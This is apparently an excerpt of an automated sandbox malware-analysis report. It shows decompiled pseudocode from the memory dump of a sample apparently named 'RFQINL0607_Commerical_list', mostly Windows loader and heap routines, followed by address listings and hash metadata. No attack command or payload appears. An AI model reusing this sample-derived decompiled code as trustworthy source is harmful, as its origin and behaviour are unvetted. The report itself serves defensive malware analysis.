					_t213 = 0x7ffe0384;
					if(_t205 == 0) {
						_t206 = 0x7ffe0384;
					} else {
						_t206 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					L333DFC01(_t280 - 0x43c,  *_t206 & 0x000000ff);
				}
				if(_t266 == 0 || _t266 == 0xffffffff) {
					_t267 = 0xc000000d;
					goto L16;
				} else {
					 *(_t280 - 0x42c) =  *(_t280 - 0x430) & 0x00001000;
					_t150 = E333E314A(_t266, _t280 - 0x45c);
					if(_t150 >= 0 ||  *(_t280 - 0x42c) == _t271) {
						_t150 = E333E3592(_t266, _t280 - 0x210, 0x40);
						if(_t150 >= 0) {
							if( *((intOrPtr*)(_t280 - 0x210)) == 0x5a4d) {
								_t269 =  *((intOrPtr*)(_t280 - 0x1d4));
								if( *(_t280 - 0x42c) == _t271) {
									L22:
									_t150 = E333E3592( *((intOrPtr*)(_t280 - 0x428)), _t280 - 0x1d0, 0x108);
									if(_t150 >= 0) {
										if( *((intOrPtr*)(_t280 - 0x1d0)) != 0x4550) {
											goto L15;
										} else {
											if( *((intOrPtr*)(_t280 - 0x1b8)) != 0x10b) {
												if( *((intOrPtr*)(_t280 - 0x1b8)) != 0x20b ||  *((intOrPtr*)(_t280 - 0x1cc)) != 0x200 &&  *((intOrPtr*)(_t280 - 0x1cc)) != 0x8664) {
													goto L15;
												} else {
													if( *((intOrPtr*)(_t280 - 0x14c)) <= 2 ||  *((intOrPtr*)(_t280 - 0x134)) == _t271) {
														goto L30;
													} else {
														_t230 =  *((intOrPtr*)(_t280 - 0x1bc));
														if(_t230 == 0 || _t230 < 0x88) {
															goto L15;
														} else {
															_t216 =  *((intOrPtr*)(_t280 - 0x138));
															goto L43;
														}
													}
												}
											} else {
												_t245 = 0x14c;
												_t201 =  *((intOrPtr*)(_t280 - 0x1cc));
												if(_t201 == _t245 || _t201 == _t245 + 0x74 || _t201 == 0x1c2 || _t201 == 0x1c4) {
													if( *((intOrPtr*)(_t280 - 0x15c)) > 2) {
														if( *((intOrPtr*)(_t280 - 0x144)) == _t271) {
															goto L30;
														} else {
															_t230 =  *((intOrPtr*)(_t280 - 0x1bc));
															if(_t230 == 0 || _t230 < 0x78) {
																goto L15;
															} else {
																_t216 =  *((intOrPtr*)(_t280 - 0x148));
																L43:
																if(_t216 != 0) {
																	_t167 =  *(_t280 - 0x1ca);
																	if(_t167 != 0) {
																		_t273 = (_t167 & 0x0000ffff) * 0x28;
																		if((_t230 & 0x0000ffff) + 0x18 + (_t167 & 0x0000ffff) * 0x28 + _t269 <=  *((intOrPtr*)(_t280 - 0x45c))) {
																			_t147 = L33365D90(_t230,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t273);
																			 *(_t280 - 0x420) = _t147;
																			 *(_t280 - 0x448) = _t147;
																			if(_t147 != 0) {
																				_t274 =  *(_t280 - 0x420);
																				_t267 = E333E3592( *((intOrPtr*)(_t280 - 0x428)), _t274, _t273);
																				 *((intOrPtr*)(_t280 - 0x41c)) = _t267;
																				if(_t267 < 0) {
																					L59:
																					_t147 =  *(_t280 - 0x420);
																					goto L60;
																				} else {
																					_t232 = _t274;
																					 *(_t280 - 0x438) = _t274;
																					_t258 = 0;
																					_t275 =  *(_t280 - 0x1ca) & 0x0000ffff;
																					if(_t275 != 0) {
																						while(_t216 < _t232[0xc] || _t216 >= _t232[0x10] + _t232[0xc]) {
																							_t232 =  &(_t232[0x28]);
																							_t258 = _t258 + 1;
																							if(_t258 < _t275) {
																								continue;
																							}
																							break;
																						}
																						 *(_t280 - 0x438) = _t232;
																					}
																					if(_t258 < _t275) {
																						_t278 = _t232[0x14] - _t232[0xc] + _t216;
																						if(_t232[0x14] - _t232[0xc] + _t216 == 0) {
																							goto L58;
																						} else {
																							_t217 =  *((intOrPtr*)(_t280 - 0x428));
																							_t267 = L333E3C37(_t217, _t278);
																							 *((intOrPtr*)(_t280 - 0x41c)) = _t267;
																							if(_t267 < 0) {
																								goto L59;
																							} else {
																								if( *((intOrPtr*)(_t280 + 0xc)) != 3) {
																									L73:
																									 *((short*)(_t280 - 0x424)) = 0;
																									_t260 = _t217;
																									_t267 = E3335E9A0(0, _t217,  *((intOrPtr*)(_t280 - 0x45c)), _t278, _t280 - 0x1d0,  *(_t280 - 0x438),  *((intOrPtr*)(_t280 - 0x440)),  *((intOrPtr*)(_t280 + 0xc)), _t280 - 0x418,  *((intOrPtr*)(_t280 - 0x450)),  *((intOrPtr*)(_t280 - 0x44c)),  *(_t280 - 0x430), _t280 - 0x424);
																									 *((intOrPtr*)(_t280 - 0x41c)) = _t267;
																									if(_t267 < 0) {
																										goto L59;
																									} else {
																										_t235 =  *((intOrPtr*)(_t280 - 0x434));
																										if(_t235 == 0) {
																											goto L59;
																										} else {
																											_t182 =  *((intOrPtr*)(_t280 - 0x424));
																											_t271 = 0;
																											if( *((intOrPtr*)(_t280 - 0x424)) != 0) {
																												 *((intOrPtr*)(_t280 - 0x468)) = _t280 - 0xc8;
																												 *((short*)(_t280 - 0x46a)) = 0xac;
																												_t267 = E33375A40(_t260, _t182 & 0x0000ffff, _t280 - 0x46c, 2, 0);
																												 *((intOrPtr*)(_t280 - 0x41c)) = _t267;
																												if(_t267 < 0) {
																													goto L85;
																												} else {
																													_t218 = _t280 - 0xc8;
																													_t239 = _t218 + 2;
																													do {
																														_t185 =  *_t218;
																														_t218 = _t218 + 2;
																													} while (_t185 != 0);
																													_t220 = _t218 - _t239 >> 1;
																													_t235 =  *((intOrPtr*)(_t280 - 0x434));
																													goto L81;
																												}
																											} else {
																												_t220 = 0;
																												L81:
																												 *(_t280 - 4) = _t271;
																												if(_t220 >=  *_t235) {
																													L84:
																													 *_t235 = _t220 + 1;
																													_t267 = 0xc0000023;
																													 *((intOrPtr*)(_t280 - 0x41c)) = 0xc0000023;
																													 *(_t280 - 4) = 0xfffffffe;
																													L85:
																													_t147 =  *(_t280 - 0x420);
																													goto L61;
																												} else {
																													_t187 =  *((intOrPtr*)(_t280 - 0x444));
																													if( *((intOrPtr*)(_t280 - 0x444)) == 0) {
																														goto L84;
																													} else {
																														_t279 = _t220 + _t220;
																														E333988C0(_t187, _t280 - 0xc8, _t279);
																														 *((intOrPtr*)( *((intOrPtr*)(_t280 - 0x434)))) = _t220 + 1;
																														 *((short*)(_t279 +  *((intOrPtr*)(_t280 - 0x444)))) = 0;
																														 *(_t280 - 4) = 0xfffffffe;
																														goto L59;
																													}
																												}
																											}
																										}
																									}
																								} else {
																									 *((short*)(_t280 - 0x418)) = 0;
																									_t193 =  *( *((intOrPtr*)(_t280 - 0x440)) + 8) & 0x0000ffff;
																									_t243 =  *(_t280 - 0x430);
																									if(( *(_t280 - 0x430) & 0x00000020) == 0) {
																										_t267 = E3335A2E0(0, 0, _t193, _t243, _t280 - 0x418);
																										 *((intOrPtr*)(_t280 - 0x41c)) = _t267;
																										if(_t267 >= 0 ||  *(_t280 - 0x42c) == 0) {
																											goto L73;
																										} else {
																											goto L59;
																										}
																									} else {
																										 *((short*)(_t280 - 0x418)) = 1;
																										 *((short*)(_t280 - 0x414)) = 0;
																										goto L73;
																									}
																								}
																							}
																						}
																						goto L93;
																					} else {
																						L58:
																						_t267 = 0xc000007b;
																						 *((intOrPtr*)(_t280 - 0x41c)) = 0xc000007b;
																						goto L59;
																					}
																				}
																			} else {
																				_t267 = 0xc0000017;
																				 *((intOrPtr*)(_t280 - 0x41c)) = 0xc0000017;
																				L60:
																				_t271 = 0;
																			}
																		} else {
																			_t271 = 0;
																			goto L46;
																		}
																	} else {
																		L46:
																		_t267 = 0xc000007b;
																		 *((intOrPtr*)(_t280 - 0x41c)) = 0xc000007b;
																		_t147 = _t271;
																	}
																	L61:
																	_t213 = 0x7ffe0384;
																	goto L62;
																} else {
																	_t150 = 0xc0000089;
																}
															}
														}
													} else {
														L30:
														_t267 = 0xc0000089;
														goto L16;
													}
												} else {
													goto L15;
												}
											}
										}
									}
								} else {
									if(E333494A3(_t269, 0xf8, _t280 - 0x448) < 0 || _t269 > 0x10000000) {
										goto L15;
									} else {
										_t204 = _t269 + 0xf8;
										if(_t204 <= _t269 || _t204 >=  *((intOrPtr*)(_t280 - 0x45c))) {
											goto L15;
										} else {
											goto L22;
										}
									}
								}
							} else {
								L15:
								_t267 = 0xc000007b;
								L16:
								 *((intOrPtr*)(_t280 - 0x41c)) = _t267;
								_t147 = _t271;
								L62:
								if(_t147 != 0) {
									E33363BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t271, _t147);
									_t267 =  *((intOrPtr*)(_t280 - 0x41c));
								}
								if(L33363C40() == 0) {
									_t149 = 0x7ffe0385;
								} else {
									_t149 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
									_t267 =  *((intOrPtr*)(_t280 - 0x41c));
								}
								if(( *_t149 & 0x00000001) != 0) {
									if(L33363C40() != 0) {
										_t213 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
										_t267 =  *((intOrPtr*)(_t280 - 0x41c));
									}
									L333DFC01(_t280 - 0x464,  *_t213 & 0x000000ff);
								}
								_t150 = _t267;
							}
						}
					}
				}
				L93:
				 *[fs:0x0] =  *((intOrPtr*)(_t280 - 0x10));
				return _t150;
			}




































                                                                                                                                                                                  0x333e3608
                                                                                                                                                                                  0x333e360d
                                                                                                                                                                                  0x333e3612
                                                                                                                                                                                  0x333e3617
                                                                                                                                                                                  0x333e361d
                                                                                                                                                                                  0x333e361f
                                                                                                                                                                                  0x333e3628
                                                                                                                                                                                  0x333e3631
                                                                                                                                                                                  0x333e363a
                                                                                                                                                                                  0x333e3643
                                                                                                                                                                                  0x333e364c
                                                                                                                                                                                  0x333e3654
                                                                                                                                                                                  0x333e3655
                                                                                                                                                                                  0x333e365e
                                                                                                                                                                                  0x333e365f
                                                                                                                                                                                  0x333e3666
                                                                                                                                                                                  0x333e3672
                                                                                                                                                                                  0x333e3673
                                                                                                                                                                                  0x333e367a
                                                                                                                                                                                  0x333e3681
                                                                                                                                                                                  0x333e368f
                                                                                                                                                                                  0x333e3699
                                                                                                                                                                                  0x333e36a8
                                                                                                                                                                                  0x333e36ba
                                                                                                                                                                                  0x333e36aa
                                                                                                                                                                                  0x333e36b3
                                                                                                                                                                                  0x333e36b3
                                                                                                                                                                                  0x333e36c2
                                                                                                                                                                                  0x333e36f4
                                                                                                                                                                                  0x333e36c4
                                                                                                                                                                                  0x333e36c4
                                                                                                                                                                                  0x333e36c9
                                                                                                                                                                                  0x333e36d0
                                                                                                                                                                                  0x333e36e2
                                                                                                                                                                                  0x333e36d2
                                                                                                                                                                                  0x333e36db
                                                                                                                                                                                  0x333e36db
                                                                                                                                                                                  0x333e36ed
                                                                                                                                                                                  0x333e36ed
                                                                                                                                                                                  0x333e36fb
                                                                                                                                                                                  0x333e3be3
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333e370a
                                                                                                                                                                                  0x333e3715
                                                                                                                                                                                  0x333e3723
                                                                                                                                                                                  0x333e372a
                                                                                                                                                                                  0x333e3745
                                                                                                                                                                                  0x333e374c
                                                                                                                                                                                  0x333e375e
                                                                                                                                                                                  0x333e3772
                                                                                                                                                                                  0x333e377e
                                                                                                                                                                                  0x333e37b1
                                                                                                                                                                                  0x333e37c5
                                                                                                                                                                                  0x333e37cc
                                                                                                                                                                                  0x333e37dc
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333e37de
                                                                                                                                                                                  0x333e37ea
                                                                                                                                                                                  0x333e3862
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333e3886
                                                                                                                                                                                  0x333e388d
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333e3897
                                                                                                                                                                                  0x333e3897
                                                                                                                                                                                  0x333e38a1
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333e38b5
                                                                                                                                                                                  0x333e38b5
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333e38b5
                                                                                                                                                                                  0x333e38a1
                                                                                                                                                                                  0x333e388d
                                                                                                                                                                                  0x333e37ec
                                                                                                                                                                                  0x333e37ec
                                                                                                                                                                                  0x333e37ef
                                                                                                                                                                                  0x333e37f9
                                                                                                                                                                                  0x333e3820
                                                                                                                                                                                  0x333e3832
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333e3834
                                                                                                                                                                                  0x333e3834
                                                                                                                                                                                  0x333e383e
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333e384e
                                                                                                                                                                                  0x333e384e
                                                                                                                                                                                  0x333e38bb
                                                                                                                                                                                  0x333e38bd
                                                                                                                                                                                  0x333e38c9
                                                                                                                                                                                  0x333e38d3
                                                                                                                                                                                  0x333e38ea
                                                                                                                                                                                  0x333e38fd
                                                                                                                                                                                  0x333e390f
                                                                                                                                                                                  0x333e3914
                                                                                                                                                                                  0x333e391a
                                                                                                                                                                                  0x333e3922
                                                                                                                                                                                  0x333e3932
                                                                                                                                                                                  0x333e3950
                                                                                                                                                                                  0x333e3952
                                                                                                                                                                                  0x333e395a
                                                                                                                                                                                  0x333e399d
                                                                                                                                                                                  0x333e399d
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333e395c
                                                                                                                                                                                  0x333e395c
                                                                                                                                                                                  0x333e395e
                                                                                                                                                                                  0x333e3964
                                                                                                                                                                                  0x333e3966
                                                                                                                                                                                  0x333e396f
                                                                                                                                                                                  0x333e3971
                                                                                                                                                                                  0x333e3980
                                                                                                                                                                                  0x333e3983
                                                                                                                                                                                  0x333e3986
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333e3986
                                                                                                                                                                                  0x333e3988
                                                                                                                                                                                  0x333e3988
                                                                                                                                                                                  0x333e3990
                                                                                                                                                                                  0x333e39f0
                                                                                                                                                                                  0x333e39f2
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333e39f4
                                                                                                                                                                                  0x333e39f6
                                                                                                                                                                                  0x333e3a03
                                                                                                                                                                                  0x333e3a05
                                                                                                                                                                                  0x333e3a0d
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333e3a0f
                                                                                                                                                                                  0x333e3a13
                                                                                                                                                                                  0x333e3a73
                                                                                                                                                                                  0x333e3a75
                                                                                                                                                                                  0x333e3ab9
                                                                                                                                                                                  0x333e3ac2
                                                                                                                                                                                  0x333e3ac4
                                                                                                                                                                                  0x333e3acc
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333e3ad2
                                                                                                                                                                                  0x333e3ad2
                                                                                                                                                                                  0x333e3ada
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333e3ae0
                                                                                                                                                                                  0x333e3ae0
                                                                                                                                                                                  0x333e3ae7
                                                                                                                                                                                  0x333e3aec
                                                                                                                                                                                  0x333e3af8
                                                                                                                                                                                  0x333e3b03
                                                                                                                                                                                  0x333e3b1d
                                                                                                                                                                                  0x333e3b1f
                                                                                                                                                                                  0x333e3b27
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333e3b29
                                                                                                                                                                                  0x333e3b29
                                                                                                                                                                                  0x333e3b2f
                                                                                                                                                                                  0x333e3b32
                                                                                                                                                                                  0x333e3b32
                                                                                                                                                                                  0x333e3b35
                                                                                                                                                                                  0x333e3b38
                                                                                                                                                                                  0x333e3b3f
                                                                                                                                                                                  0x333e3b41
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333e3b41
                                                                                                                                                                                  0x333e3aee
                                                                                                                                                                                  0x333e3aee
                                                                                                                                                                                  0x333e3b47
                                                                                                                                                                                  0x333e3b47
                                                                                                                                                                                  0x333e3b4c
                                                                                                                                                                                  0x333e3b8f
                                                                                                                                                                                  0x333e3b92
                                                                                                                                                                                  0x333e3b94
                                                                                                                                                                                  0x333e3b99
                                                                                                                                                                                  0x333e3b9f
                                                                                                                                                                                  0x333e3ba6
                                                                                                                                                                                  0x333e3ba6
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333e3b4e
                                                                                                                                                                                  0x333e3b4e
                                                                                                                                                                                  0x333e3b56
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333e3b58
                                                                                                                                                                                  0x333e3b58
                                                                                                                                                                                  0x333e3b64
                                                                                                                                                                                  0x333e3b75
                                                                                                                                                                                  0x333e3b7f
                                                                                                                                                                                  0x333e3b83
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333e3b83
                                                                                                                                                                                  0x333e3b56
                                                                                                                                                                                  0x333e3b4c
                                                                                                                                                                                  0x333e3aec
                                                                                                                                                                                  0x333e3ada
                                                                                                                                                                                  0x333e3a15
                                                                                                                                                                                  0x333e3a17
                                                                                                                                                                                  0x333e3a24
                                                                                                                                                                                  0x333e3a28
                                                                                                                                                                                  0x333e3a31
                                                                                                                                                                                  0x333e3a5a
                                                                                                                                                                                  0x333e3a5c
                                                                                                                                                                                  0x333e3a64
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333e3a33
                                                                                                                                                                                  0x333e3a36
                                                                                                                                                                                  0x333e3a3f
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333e3a3f
                                                                                                                                                                                  0x333e3a31
                                                                                                                                                                                  0x333e3a13
                                                                                                                                                                                  0x333e3a0d
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333e3992
                                                                                                                                                                                  0x333e3992
                                                                                                                                                                                  0x333e3992
                                                                                                                                                                                  0x333e3997
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333e3997
                                                                                                                                                                                  0x333e3990
                                                                                                                                                                                  0x333e3924
                                                                                                                                                                                  0x333e3924
                                                                                                                                                                                  0x333e3929
                                                                                                                                                                                  0x333e39a3
                                                                                                                                                                                  0x333e39a3
                                                                                                                                                                                  0x333e39a3
                                                                                                                                                                                  0x333e38ff
                                                                                                                                                                                  0x333e38ff
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333e38ff
                                                                                                                                                                                  0x333e38d5
                                                                                                                                                                                  0x333e38d5
                                                                                                                                                                                  0x333e38d5
                                                                                                                                                                                  0x333e38da
                                                                                                                                                                                  0x333e38e0
                                                                                                                                                                                  0x333e38e0
                                                                                                                                                                                  0x333e39a5
                                                                                                                                                                                  0x333e39a5
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333e38bf
                                                                                                                                                                                  0x333e38bf
                                                                                                                                                                                  0x333e38bf
                                                                                                                                                                                  0x333e38bd
                                                                                                                                                                                  0x333e383e
                                                                                                                                                                                  0x333e3822
                                                                                                                                                                                  0x333e3822
                                                                                                                                                                                  0x333e3822
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333e3822
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333e37f9
                                                                                                                                                                                  0x333e37ea
                                                                                                                                                                                  0x333e37dc
                                                                                                                                                                                  0x333e3780
                                                                                                                                                                                  0x333e3795
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333e379f
                                                                                                                                                                                  0x333e379f
                                                                                                                                                                                  0x333e37a7
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333e37a7
                                                                                                                                                                                  0x333e3795
                                                                                                                                                                                  0x333e3760
                                                                                                                                                                                  0x333e3760
                                                                                                                                                                                  0x333e3760
                                                                                                                                                                                  0x333e3765
                                                                                                                                                                                  0x333e3765
                                                                                                                                                                                  0x333e376b
                                                                                                                                                                                  0x333e39aa
                                                                                                                                                                                  0x333e39ac
                                                                                                                                                                                  0x333e39b9
                                                                                                                                                                                  0x333e39be
                                                                                                                                                                                  0x333e39be
                                                                                                                                                                                  0x333e39cb
                                                                                                                                                                                  0x333e3bed
                                                                                                                                                                                  0x333e39d1
                                                                                                                                                                                  0x333e39da
                                                                                                                                                                                  0x333e39df
                                                                                                                                                                                  0x333e39df
                                                                                                                                                                                  0x333e3bf5
                                                                                                                                                                                  0x333e3bfe
                                                                                                                                                                                  0x333e3c09
                                                                                                                                                                                  0x333e3c0f
                                                                                                                                                                                  0x333e3c0f
                                                                                                                                                                                  0x333e3c1e
                                                                                                                                                                                  0x333e3c1e
                                                                                                                                                                                  0x333e3c23
                                                                                                                                                                                  0x333e3c23
                                                                                                                                                                                  0x333e375e
                                                                                                                                                                                  0x333e374c
                                                                                                                                                                                  0x333e372a
                                                                                                                                                                                  0x333e3c25
                                                                                                                                                                                  0x333e3c28
                                                                                                                                                                                  0x333e3c34

                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                                                                                                                                                                                  • API String ID: 0-1168191160
                                                                                                                                                                                  • Opcode ID: eb58395aabcd02507cbf535db5af3cd34c0c5a885b469c51907b944db3e2132a
                                                                                                                                                                                  • Instruction ID: 636893c504ede3b6668ac062ea40df8e5a1d54eecb3f787e1b7faa8fe8f4fef0
                                                                                                                                                                                  • Opcode Fuzzy Hash: eb58395aabcd02507cbf535db5af3cd34c0c5a885b469c51907b944db3e2132a
                                                                                                                                                                                  • Instruction Fuzzy Hash: 36F16DB6E412388BDB21CF14CC80B99B3B5EF44764F44D0E9E649A7250EB319E85CF5A
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 33351380 Relevance: 4.1, Strings: 3, Instructions: 385COMMONCrypto
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 82%
                                                                                                                                                                                  			E33351380(signed int __ecx, unsigned int __edx, signed int _a4, signed int _a8, signed int _a12) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				unsigned int _v24;
				signed int _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t167;
				signed int _t176;
				signed short _t181;
				intOrPtr _t182;
				signed int _t184;
				signed int _t185;
				signed int _t189;
				intOrPtr _t192;
				signed int _t193;
				char _t195;
				signed int _t198;
				signed int _t204;
				void* _t208;
				signed int _t209;
				signed int _t211;
				short _t218;
				intOrPtr _t219;
				signed short _t226;
				signed short _t229;
				signed int _t231;
				signed int _t233;
				signed int _t235;
				intOrPtr _t236;
				intOrPtr _t246;
				signed int _t250;
				signed int _t253;
				signed int _t260;
				signed int _t262;
				void* _t264;
				intOrPtr* _t265;
				signed char _t267;
				signed char _t268;
				signed int _t270;
				signed int _t271;
				signed int _t272;
				signed int _t274;
				signed int _t276;
				signed int _t287;
				void* _t288;
				unsigned int _t296;
				void* _t299;
				signed int _t303;
				signed short _t306;
				signed short* _t307;
				signed int _t309;
				char _t311;
				signed int _t312;
				signed int _t313;
				signed int _t315;
				void* _t317;
				signed char _t318;
				signed short* _t327;
				signed int _t329;
				signed int _t330;
				signed short* _t331;
				signed int _t333;

				_t167 = _a12;
				_t260 = __ecx;
				_v24 = __edx;
				_t331 = _a4;
				_v12 = _t167;
				if(_t167 >  *((intOrPtr*)(__ecx + 0x5c))) {
					L7:
					return 0;
				}
				_v5 = _t331[1];
				_t327 = _t331 + ( *_t331 & 0x0000ffff) * 8;
				if((( *(__ecx + 0x4c) >> 0x00000014 &  *(__ecx + 0x52) ^ _t327[1]) & 0x00000001) != 0) {
					goto L7;
				}
				if( *(__ecx + 0x4c) != 0) {
					 *_t327 =  *_t327 ^  *(__ecx + 0x50);
					if(_t327[1] != (_t327[0] ^ _t327[1] ^  *_t327)) {
						_push(__ecx);
						E3340D646(__ecx, __ecx, _t327, _t327, _t331, __eflags);
					}
				}
				_t262 =  *_t327 & 0x0000ffff;
				_t176 = ( *_t331 & 0x0000ffff) + _t262;
				_v28 = _t176;
				if(_t176 < _v12) {
					__eflags =  *(_t260 + 0x4c);
					if( *(_t260 + 0x4c) != 0) {
						_t327[1] = _t327[0] ^ _t327[1] ^  *_t327;
						 *_t327 =  *_t327 ^  *(_t260 + 0x50);
					}
					goto L7;
				}
				_t181 = _t327[4];
				_t306 = _t327[6];
				_v20 = _t181;
				_v16 = _t306;
				_t182 =  *((intOrPtr*)(_t181 + 4));
				_t27 =  &(_t327[4]); // 0x10
				_t307 = _t27;
				if( *_t306 == _t182) {
					__eflags =  *_v16 - _t307;
					_t333 = _a4;
					if( *_v16 != _t307) {
						goto L6;
					}
					 *((intOrPtr*)(_t260 + 0x74)) =  *((intOrPtr*)(_t260 + 0x74)) - _t262;
					_t309 =  *(_t260 + 0xb4);
					__eflags = _t309;
					if(_t309 == 0) {
						L17:
						_t265 = _v16;
						_t184 = _v20;
						 *_t265 = _t184;
						 *((intOrPtr*)(_t184 + 4)) = _t265;
						__eflags = _t327[1] & 0x00000008;
						if((_t327[1] & 0x00000008) != 0) {
							_t185 = E3334F5C7(_t260, _t327);
							__eflags = _t185;
							if(_t185 != 0) {
								goto L18;
							}
							E3334F113(_t260, _t327,  *_t327 & 0x0000ffff, "true");
							goto L7;
						}
						L18:
						_t267 = _t327[1];
						_t311 = 0;
						__eflags = _t267 & 0x00000004;
						if((_t267 & 0x00000004) == 0) {
							L24:
							_t268 =  *((intOrPtr*)(_t333 + 7));
							_t329 = ( *_t333 & 0x0000ffff) << 3;
							_v20 = _t327[1];
							__eflags = _t268 - 5;
							if(_t268 == 5) {
								_t270 =  *(_t260 + 0x54) & 0x0000ffff ^  *(_t333 + 4) & 0x0000ffff;
							} else {
								__eflags = _t268 & 0x00000040;
								if((_t268 & 0x00000040) != 0) {
									_t270 =  *(_t333 + 4 + (_t268 & 0x3f) * 8) & 0x0000ffff;
								} else {
									__eflags = (_t268 & 0x0000003f) - 0x3f;
									if((_t268 & 0x0000003f) == 0x3f) {
										__eflags = _t268;
										if(_t268 >= 0) {
											__eflags =  *(_t260 + 0x4c) - _t311;
											if( *(_t260 + 0x4c) == _t311) {
												_t226 =  *_t333 & 0x0000ffff;
											} else {
												_t229 =  *_t333;
												__eflags =  *(_t260 + 0x4c) & _t229;
												if(( *(_t260 + 0x4c) & _t229) != 0) {
													_t229 = _t229 ^  *(_t260 + 0x50);
													__eflags = _t229;
												}
												_t226 = _t229 & 0x0000ffff;
											}
										} else {
											_t296 = _t333 >> 0x00000003 ^  *_t333 ^  *0x33446964 ^ _t260;
											__eflags = _t296;
											if(_t296 == 0) {
												_t231 = _t333 - (_t296 >> 0xd);
												__eflags = _t231;
												_t311 =  *_t231;
											}
											_t226 =  *((intOrPtr*)(_t311 + 0x14));
										}
										_t270 =  *(_t333 + (_t226 & 0xffff) * 8 - 4);
									} else {
										_t270 = _t268 & 0x3f;
										__eflags = _t270;
									}
								}
							}
							_t312 = _v12;
							_t330 = _t329 - _t270;
							_t271 = _v28;
							_t189 = _t271 - _t312;
							__eflags = _t189 - 2;
							if(_t189 <= 2) {
								_t312 = _t271;
								_v12 = _t312;
							}
							_t272 = 2;
							__eflags = _t272 - _t189;
							asm("sbb ecx, ecx");
							__eflags = _v5 & 0x00000002;
							_v16 = _t272 & _t189;
							if((_v5 & 0x00000002) != 0) {
								_t274 =  *_t333 & 0x0000ffff;
								 *((intOrPtr*)(_t333 + _t312 * 8 - 8)) =  *((intOrPtr*)(_t333 + _t274 * 8 - 8));
								 *((intOrPtr*)(_t333 + _t312 * 8 - 4)) =  *((intOrPtr*)(_t333 + _t274 * 8 - 4));
								_t192 =  *[fs:0x30];
								__eflags =  *(_t192 + 0x68) & 0x00000800;
								if(( *(_t192 + 0x68) & 0x00000800) == 0) {
									goto L31;
								}
								_t218 = E333F9AFE(_t260,  *((intOrPtr*)(_t333 + _t312 * 8 - 6)),  *_t333 & 0x0000ffff, _t312, 4);
								_t313 = _v12;
								 *((short*)(_t333 + _t313 * 8 - 6)) = _t218;
								goto L32;
							} else {
								_t219 =  *[fs:0x30];
								__eflags =  *(_t219 + 0x68) & 0x00000800;
								if(( *(_t219 + 0x68) & 0x00000800) != 0) {
									 *(_t333 + 3) = E333F9AFE(_t260,  *(_t333 + 3) & 0x000000ff,  *_t333 & 0x0000ffff, _t312, 4);
								}
								L31:
								_t313 = _v12;
								L32:
								_t193 = _t313 & 0x0000ffff;
								_t276 = _t313 << 3;
								_v12 = _t193;
								 *_t333 = _t193;
								_t195 = _t276 - _a8;
								__eflags = _v16;
								if(_v16 == 0) {
									 *(_t333 + 2) =  *(_t333 + 2) | _v20;
									__eflags = _t195 - 0x3f;
									if(_t195 >= 0x3f) {
										 *((intOrPtr*)(_t276 + _t333 - 4)) = _t195;
										 *((char*)(_t333 + 7)) = 0x3f;
									} else {
										 *((char*)(_t333 + 7)) = _t195;
									}
									 *(_t333 + 4 + ( *_t333 & 0x0000ffff) * 8) =  *(_t260 + 0x54) ^  *_t333 & 0x0000ffff;
								} else {
									_t288 = _t276 + _t333;
									__eflags = _t195 - 0x3f;
